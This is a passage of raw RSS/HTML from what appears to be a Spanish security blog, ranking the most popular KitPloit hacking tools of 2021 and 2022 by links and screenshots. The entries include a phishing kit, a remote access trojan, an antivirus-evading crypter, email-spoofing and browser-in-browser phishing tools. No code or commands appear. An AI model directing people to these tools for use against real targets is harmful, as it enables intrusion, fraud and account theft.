  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAeX0I23aNQJkeOfgULnJOI_B9eSKrMiIGmeZ_wjCQ_9l457GVTNfno5YMJ6Tc4PcGMghK0MHaQ9nLw3GFQYcxWGhjSuBRvyJM7n0UIJGzXdwcv3R2fJoGEjizIJjHLx9xDiQNTAqX1Swxu1nN1toYzbnDRF2jeXlbsu-Oo8Dqmwjis56sOYLIiJxFxg/s639/07_Android-PIN-Bruteforce_1.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="442" data-original-width="639" height="276" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAeX0I23aNQJkeOfgULnJOI_B9eSKrMiIGmeZ_wjCQ_9l457GVTNfno5YMJ6Tc4PcGMghK0MHaQ9nLw3GFQYcxWGhjSuBRvyJM7n0UIJGzXdwcv3R2fJoGEjizIJjHLx9xDiQNTAqX1Swxu1nN1toYzbnDRF2jeXlbsu-Oo8Dqmwjis56sOYLIiJxFxg/w400-h276/07_Android-PIN-Bruteforce_1.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2021/03/androidhid-use-android-as-rubber-ducky.html" target="_blank"&gt;Android_Hid - Use Android As Rubber Ducky Against Another Android Device&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   
  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjr633559bob-l1ynywkPYhhKra0J5PDPuRyJ_dBD0s5-h7wg5bD0Gtd_2CiZCQvvE8xeF40ySQHeTp5SwC_xcl4QLHnpOjP9SU_CgdiBDB7usR5-Snudh4CilvyLuCs3freJgkIuYu4YSZF7JLlQuOaKs1_dImECQ3oOxSXe5m8s2Pm3cZ4_IHH6z8Xg/s640/08_Android_Hid.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="640" data-original-width="521" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjr633559bob-l1ynywkPYhhKra0J5PDPuRyJ_dBD0s5-h7wg5bD0Gtd_2CiZCQvvE8xeF40ySQHeTp5SwC_xcl4QLHnpOjP9SU_CgdiBDB7usR5-Snudh4CilvyLuCs3freJgkIuYu4YSZF7JLlQuOaKs1_dImECQ3oOxSXe5m8s2Pm3cZ4_IHH6z8Xg/w326-h400/08_Android_Hid.png" width="326" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2021/11/cracken-fast-password-wordlist.html" target="_blank"&gt;Cracken - A Fast Password Wordlist Generator, Smartlist Creation And Password Hybrid-Mask Analysis Tool&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   
  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijGPTtDOxcA4Xd5GcmliXlDZANuAwpo-7Zh9PqqJ7Me2z5fJEYnNWhcmM1pLRtl2IFYsf7d4a8KPuRxYqpdXLoO_bL-rnOWqvMG9tcxPIr9ZmXbG756rpuFMML0GTKBH2o5BlsEukbU88I5N9KCRnPzRgOFnnRdmWn1cQH26HZXVGX5oe1asv7Hc1DRQ/s640/09_h96.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="428" data-original-width="640" height="268" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijGPTtDOxcA4Xd5GcmliXlDZANuAwpo-7Zh9PqqJ7Me2z5fJEYnNWhcmM1pLRtl2IFYsf7d4a8KPuRxYqpdXLoO_bL-rnOWqvMG9tcxPIr9ZmXbG756rpuFMML0GTKBH2o5BlsEukbU88I5N9KCRnPzRgOFnnRdmWn1cQH26HZXVGX5oe1asv7Hc1DRQ/w400-h268/09_h96.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2020/07/hackingtool-all-in-one-hacking-tool-for.html" target="_blank"&gt;HackingTool - ALL IN ONE Hacking Tool For Hackers&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   
  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirDypynS9EyoFjmMa_DDRry9kgkNab_geAr8hBu3w9xCQmF9r6U5EKqQrOLhxgUogqzQHxFi-pe0aBycQUaT77Qyadeqh1uG7qM3MxNT2vhB3KVGXnaXXwKWLd4_SAWOdB4pRrUTlPMh6-ONYsm5lFlGJkgzsVKOkS_Ih1ei9GTj0KGvRQjhur9yJtsQ/s640/10_hackingtool_8.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="347" data-original-width="640" height="217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirDypynS9EyoFjmMa_DDRry9kgkNab_geAr8hBu3w9xCQmF9r6U5EKqQrOLhxgUogqzQHxFi-pe0aBycQUaT77Qyadeqh1uG7qM3MxNT2vhB3KVGXnaXXwKWLd4_SAWOdB4pRrUTlPMh6-ONYsm5lFlGJkgzsVKOkS_Ih1ei9GTj0KGvRQjhur9yJtsQ/w400-h217/10_hackingtool_8.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2021/01/arbitrium-rat-cross-platform-fully.html" target="_blank"&gt;Arbitrium-RAT - A Cross-Platform, Fully Undetectable Remote Access Trojan, To Control Android, Windows And Linux&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
  
  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzy9aKeqq9qRdggkXi-1GaHV0WLzXT1VRYBt15IumlzYwQBnjlnmD7SL0k_BKhkRvZMUoy2gv40tIwGS2I9GQhxAymfLSd042cDjjnrsrabL7tv9XVg7hD1If8nXpLXSRgjQNvKhz2HKDjy7NY_0dWMD-kVi0wCntxeb8MpURq38AJ3ZtLG1gMzxZLYw/s1280/11_Arbitrium-RAT_1.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="720" data-original-width="1280" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzy9aKeqq9qRdggkXi-1GaHV0WLzXT1VRYBt15IumlzYwQBnjlnmD7SL0k_BKhkRvZMUoy2gv40tIwGS2I9GQhxAymfLSd042cDjjnrsrabL7tv9XVg7hD1If8nXpLXSRgjQNvKhz2HKDjy7NY_0dWMD-kVi0wCntxeb8MpURq38AJ3ZtLG1gMzxZLYw/s320/11_Arbitrium-RAT_1.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2021/09/weakpass-rule-based-online-generator-to.html" target="_blank"&gt;Weakpass - Rule-Based Online Generator To Create A Wordlist Based On A Set Of Words&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   
  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiksE-YZm04BgKjdJc_BsaHCRgZ-KB1p8hyR0-DJmfUtB_vxudVJMlgUWYz3emKK11l_wDRChBC5rxlfLDA9xzYrm62P6xFYXIipFTOBVbecB0MbyaVjN50qBKMxmLxfsvUC8ylKvUygUp7wGqAq4aq_yQKxHoegp4kqUWP16jufZArQl9cxsOPFqZqOA/s1851/12_weakpass_1_sample.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="939" data-original-width="1851" height="203" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiksE-YZm04BgKjdJc_BsaHCRgZ-KB1p8hyR0-DJmfUtB_vxudVJMlgUWYz3emKK11l_wDRChBC5rxlfLDA9xzYrm62P6xFYXIipFTOBVbecB0MbyaVjN50qBKMxmLxfsvUC8ylKvUygUp7wGqAq4aq_yQKxHoegp4kqUWP16jufZArQl9cxsOPFqZqOA/w400-h203/12_weakpass_1_sample.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2022/03/geowifi-search-wifi-geolocation-data-by.html" target="_blank"&gt;Geowifi - Search WiFi Geolocation Data By BSSID And SSID On Different Public Databases&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;

  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3PDyrLpPGDiBXn-WLe8ND7jkONJqEn2tkQazAJ_bH9f38aiUhrPtur92ewNH8p35X44KoM8f0ep6YVv76IBgexu3-QA9ZNTGM7rAYuuMil5s-estSdvMLvlZoMSH2xMtrrtugbiefvyjfPDhKTKDl25VlyzyRy1sZm-6aagMgQN0nH_LA0130f4aE6g/s839/13_geowifi_1-739512.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="457" data-original-width="839" height="217" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3PDyrLpPGDiBXn-WLe8ND7jkONJqEn2tkQazAJ_bH9f38aiUhrPtur92ewNH8p35X44KoM8f0ep6YVv76IBgexu3-QA9ZNTGM7rAYuuMil5s-estSdvMLvlZoMSH2xMtrrtugbiefvyjfPDhKTKDl25VlyzyRy1sZm-6aagMgQN0nH_LA0130f4aE6g/w400-h217/13_geowifi_1-739512.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2022/04/bitb-browser-in-browser-bitb-templates.html" target="_blank"&gt;BITB - Browser In The Browser (BITB) Templates&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   
  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjklsoIJfXsyMO3cFu2o8F9_CsiYd6DPjSgR_id4vXvZkWtFIpWIim3iw0VgKsIOYPYa2tNC3zFxqVVE5-Q3c2UcPlQ2tIe5AIwT-Cpngw_aYpTNd9bAIZ8cncAUeSJOTm83Emnecj_qaWSHTk0YPPARQnUDaryOdx7gfkmGLdBVrnIMIrevmo6KC0ffw/s700/14_real-fake.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="484" data-original-width="700" height="276" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjklsoIJfXsyMO3cFu2o8F9_CsiYd6DPjSgR_id4vXvZkWtFIpWIim3iw0VgKsIOYPYa2tNC3zFxqVVE5-Q3c2UcPlQ2tIe5AIwT-Cpngw_aYpTNd9bAIZ8cncAUeSJOTm83Emnecj_qaWSHTk0YPPARQnUDaryOdx7gfkmGLdBVrnIMIrevmo6KC0ffw/w400-h276/14_real-fake.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2022/06/blackbird-osint-tool-to-search-for.html" target="_blank"&gt;Blackbird - An OSINT Tool To Search For Accounts By Username In 101 Social Networks&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;

  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHbfTMuOfP0nGX5Qt6XROM6_t13pXmuX225z_qUiLgMUipWHWRtELxMXNPsG1vfZN0-iMDUXYumVH6nAe4RzcwhhOuYkE8VisH8CrDrUBc5EVi2sH9z2ncsBiOO925ySRCeiIJ5IvYSmqcntuYHjrOF_-x8LLZ_902dEdJI20pN1_CYLjnOUDE4ycx_A/s970/15_blackbird_3_blackbird_printscreen-753230.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="333" data-original-width="970" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHbfTMuOfP0nGX5Qt6XROM6_t13pXmuX225z_qUiLgMUipWHWRtELxMXNPsG1vfZN0-iMDUXYumVH6nAe4RzcwhhOuYkE8VisH8CrDrUBc5EVi2sH9z2ncsBiOO925ySRCeiIJ5IvYSmqcntuYHjrOF_-x8LLZ_902dEdJI20pN1_CYLjnOUDE4ycx_A/w400-h138/15_blackbird_3_blackbird_printscreen-753230.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2022/01/espoofer-email-spoofing-testing-tool.html" target="_blank"&gt;Espoofer - An Email Spoofing Testing Tool That Aims To Bypass SPF/DKIM/DMARC And Forge DKIM Signatures&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
  
  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3CFtSpVpdGymvvWx0G_KqaRoUxYEs6_ISE9UHmPHUEnZ8SeijZRbdGp79LJwUu-zyEvbXXDCtR8qoK_BgTXBHDI89XJNWHHKbu34yT1R5qafgmKI-KtbMZOa2c9r8f4467z2C__FoUO9th4mIJC6wOkvVURRHh-4mzpwav5-_xFQPN7gBpW58gN1vNw/s983/16_espoofer_2_email-authentication-flow-769656.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="267" data-original-width="983" height="109" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3CFtSpVpdGymvvWx0G_KqaRoUxYEs6_ISE9UHmPHUEnZ8SeijZRbdGp79LJwUu-zyEvbXXDCtR8qoK_BgTXBHDI89XJNWHHKbu34yT1R5qafgmKI-KtbMZOa2c9r8f4467z2C__FoUO9th4mIJC6wOkvVURRHh-4mzpwav5-_xFQPN7gBpW58gN1vNw/w400-h109/16_espoofer_2_email-authentication-flow-769656.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2022/11/pycrypt-python-based-crypter-that-can.html" target="_blank"&gt;Pycrypt - Python Based Crypter That Can Bypass Any Kinds Of Antivirus Products&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
  
  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-_vSv65iRdgOxTEs4ISnhBUG4C4IX_t5fheR6gW26UPzGqX-cyBbTkfe5HiiguhMmDaENjprYhIopU9GOqOTezl2rXGxhd2JPKJwRCmu_Nvj_usJzzAlTVIgrRFXnDWf-U1ZfxE6rG68F6pnE7z2GahOwHxWN-CtdJBtf7nHlMai2KJpkrhWJJdzEgA/s706/17_pycrypt_1-715676.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="416" data-original-width="706" height="236" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-_vSv65iRdgOxTEs4ISnhBUG4C4IX_t5fheR6gW26UPzGqX-cyBbTkfe5HiiguhMmDaENjprYhIopU9GOqOTezl2rXGxhd2JPKJwRCmu_Nvj_usJzzAlTVIgrRFXnDWf-U1ZfxE6rG68F6pnE7z2GahOwHxWN-CtdJBtf7nHlMai2KJpkrhWJJdzEgA/w400-h236/17_pycrypt_1-715676.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2022/05/grafiki-threat-hunting-tool-about.html" target="_blank"&gt;Grafiki - Threat Hunting Tool About Sysmon And Graphs&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
  
  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmy-jldGG65ykQg6G5khHAzP0m169AZN2y_zwDIW49bbVT36SuNyTVmCi29Z2FsimqiL7jZulaFasAIUN16xCqiuRqEVlLlwgDZX0zpFZobz5bWxnx65_xpkirP-uuxpKo--mK5R7ILStHJp-fba0c9XDOhcfybG6hZVpEzdayl6TtNlu_p5ilUXQmog/s1256/18_Grafiki_7_example1.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="924" data-original-width="1256" height="294" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmy-jldGG65ykQg6G5khHAzP0m169AZN2y_zwDIW49bbVT36SuNyTVmCi29Z2FsimqiL7jZulaFasAIUN16xCqiuRqEVlLlwgDZX0zpFZobz5bWxnx65_xpkirP-uuxpKo--mK5R7ILStHJp-fba0c9XDOhcfybG6hZVpEzdayl6TtNlu_p5ilUXQmog/w400-h294/18_Grafiki_7_example1.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2022/08/vlanpwn-vlan-attacks-toolkit.html" target="_blank"&gt;VLANPWN - VLAN Attacks Toolkit&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   
  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgb7-cNpJy8A_9B0yKm9aWz9-hfO466XcW4fHtTL2E0RVyzkNY4itRljcZWv5ua_guxpKeQ8DUdO4cLvfR82EonQhEFl6Wp-yyOr0nWT9JebgfbHdgXGIFMV15iAWkS4I4kt6R7Xv0-gUKL8_oOeZQcdTDyRaErRGorNqhxKdqKe4sMRhUcHqPrD2ujew/s1018/19_VLANPWN.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="561" data-original-width="1018" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgb7-cNpJy8A_9B0yKm9aWz9-hfO466XcW4fHtTL2E0RVyzkNY4itRljcZWv5ua_guxpKeQ8DUdO4cLvfR82EonQhEFl6Wp-yyOr0nWT9JebgfbHdgXGIFMV15iAWkS4I4kt6R7Xv0-gUKL8_oOeZQcdTDyRaErRGorNqhxKdqKe4sMRhUcHqPrD2ujew/w400-h220/19_VLANPWN.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2022/04/linwinpwn-bash-script-that-automates.html" target="_blank"&gt;linWinPwn - A Bash Script That Automates A Number Of Active Directory Enumeration And Vulnerability Checks&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
  
  &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfR6Tiig0EgEWAO0blWEW53MCiqVb2cOQL_gHoC5ip1RYa85MtzfptoCu4zygnzmgPtWYILbEXoVIEfuhjJbsBp3f8vSbF5uSRiUlKm-jzS2ORVSD1H2_tFcB9L2OAeOlDtKp9z795X06HpeUqBp9qY1rT4TKZfd_LbQolsDySxbnDRLF7O044bDKgHg/s599/20_linWinPwn.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="527" data-original-width="599" height="353" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfR6Tiig0EgEWAO0blWEW53MCiqVb2cOQL_gHoC5ip1RYa85MtzfptoCu4zygnzmgPtWYILbEXoVIEfuhjJbsBp3f8vSbF5uSRiUlKm-jzS2ORVSD1H2_tFcB9L2OAeOlDtKp9z795X06HpeUqBp9qY1rT4TKZfd_LbQolsDySxbnDRLF7O044bDKgHg/w400-h353/20_linWinPwn.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;
&lt;/ol&gt;


&lt;br /&gt;
&lt;br /&gt;
[+] Saludos y feliz año nuevo!!&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwYixegDWiORWg25uGgur5DIP4TAFHSKfLHtrsPDKPDcgdtmze4sbhRqHyRMJcdEYMeuzFFUlXpg99dB-djW5NiJS9AQwGNFL4A7cBFpdMiXGcsC7XEipN2HYvsJjXO_10hutQ9A2TeMiyZF_3F01Yl7sk8fzxkMmuwqc6cgKFhtSsdSW2zsv8Gf8m4Q/s72-w640-h426-c/tools-2022-title-compress.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Las 20 herramientas de hacking más populares del 2021</title><link>http://www.blackploit.com/2021/12/las-20-herramientas-de-hacking-mas.html</link><category>Blackploit</category><category>Hack T00LZ</category><category>Herramientas</category><category>KitPloit</category><category>Noticias</category><category>Seguridad</category><author>noreply@blogger.com (Leo Romero)</author><pubDate>Tue, 28 Dec 2021 09:30:00 -0300</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-7256060570284576304</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/a/AVvXsEgdSxlIZ7_0FgWqUmWTiq-Y6LR8EeZGdB19L3QyZH2VHimcUizvcMF_kB3J-tZVpObGPuRCNGxiJx94kAlOOvFrMRf50CBTMK9iSrDye4LiUsErNb_vDhklcQHzHhqFNHA4qS_Cf3amT-p0qIM65hLxSzY3fXPCPglfL3Jqh4rx9F0FBuPTTDbkA8-8CQ=s1200" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="800" data-original-width="1200" height="426" src="https://blogger.googleusercontent.com/img/a/AVvXsEgdSxlIZ7_0FgWqUmWTiq-Y6LR8EeZGdB19L3QyZH2VHimcUizvcMF_kB3J-tZVpObGPuRCNGxiJx94kAlOOvFrMRf50CBTMK9iSrDye4LiUsErNb_vDhklcQHzHhqFNHA4qS_Cf3amT-p0qIM65hLxSzY3fXPCPglfL3Jqh4rx9F0FBuPTTDbkA8-8CQ=w640-h426" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;
En un ranking elaborado por &lt;a href="https://www.kitploit.com/" target="_blank"&gt;&lt;b&gt;Kitploit&lt;/b&gt;&lt;/a&gt;, nos muestran las 20 herramientas más populares (con más visitas) durante el 2021. Es una lista que merece ser revisada, donde se encuentran herramientas de diferentes desarrolladores quienes dedican su tiempo y esfuerzo a colaborar con la comunidad.&amp;nbsp;&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Destacan herramientas de &lt;b&gt;Information Gathering&lt;/b&gt;, &lt;b&gt;ingeniería social (&lt;i&gt;phishing&lt;/i&gt;)&lt;/b&gt;, entre otras. Sin más, los dejo con la lista:&lt;/div&gt;
&lt;!--more--&gt;&lt;br /&gt;


&lt;ol&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2020/03/zphisher-automated-phishing-tool.html" target="_blank"&gt;Zphisher - Automated Phishing Tool&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;

  &lt;div class="separator" style="clear: both;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/a/AVvXsEiM9qBg00LJf2pmfhTcm1uD7HD198IijaLQdQJi9aQJO2R4xkOlShU6y9gfkbuOF2z1UqryRUx2tb5nIPSpGOvtAzwQnaYAmaKw0-191aZKGreJOgGGpfddmUD9YTf9jffVS2di28q8mg6-v6BQW8r5267lJO9et-tSQMHf4aqhP4D_GZFWr5l028iunw=s537" style="display: block; padding: 1em 0px; text-align: center;"&gt;&lt;img alt="" border="0" data-original-height="537" data-original-width="356" height="400" src="https://blogger.googleusercontent.com/img/a/AVvXsEiM9qBg00LJf2pmfhTcm1uD7HD198IijaLQdQJi9aQJO2R4xkOlShU6y9gfkbuOF2z1UqryRUx2tb5nIPSpGOvtAzwQnaYAmaKw0-191aZKGreJOgGGpfddmUD9YTf9jffVS2di28q8mg6-v6BQW8r5267lJO9et-tSQMHf4aqhP4D_GZFWr5l028iunw=s400" /&gt;&lt;/a&gt;&lt;/div&gt;
  
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2021/10/dockerized-android-container-based.html" target="_blank"&gt;Dockerized-Android - A Container-Based Framework To Enable The Integration Of Mobile Components In Security Training Platforms&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;

     &lt;div class="separator" style="clear: both;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/a/AVvXsEhkmsrW56PMBXLP5uKH0oNAxz_4kxZHpso2rWvSGDqwqZkXLMuJbfvFBTmQJbj2Ed-uxLYsOtTkfKhsFuzW5VfTqPFRSy3ofw2Rk7jORqxER45YAMrlpml_nxG8Y4TRHV7uePucFgWYaA_92K28CQ0YCmnnghp1_G0abjVg8Qx384AVDP29q9dsRXeNxg=s639" style="display: block; padding: 1em 0px; text-align: center;"&gt;&lt;img alt="" border="0" data-original-height="466" data-original-width="639" src="https://blogger.googleusercontent.com/img/a/AVvXsEhkmsrW56PMBXLP5uKH0oNAxz_4kxZHpso2rWvSGDqwqZkXLMuJbfvFBTmQJbj2Ed-uxLYsOtTkfKhsFuzW5VfTqPFRSy3ofw2Rk7jORqxER45YAMrlpml_nxG8Y4TRHV7uePucFgWYaA_92K28CQ0YCmnnghp1_G0abjVg8Qx384AVDP29q9dsRXeNxg=s400" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
     
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   &lt;h2&gt;
      &lt;li&gt;&lt;a href="https://www.kitploit.com/2021/01/emp3r0r-linux-post-exploitation.html" target="_blank"&gt;Emp3R0R - Linux Post-Exploitation Framework Made By Linux User&lt;/a&gt;&lt;/li&gt;
   &lt;/h2&gt;
   &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;
   
  
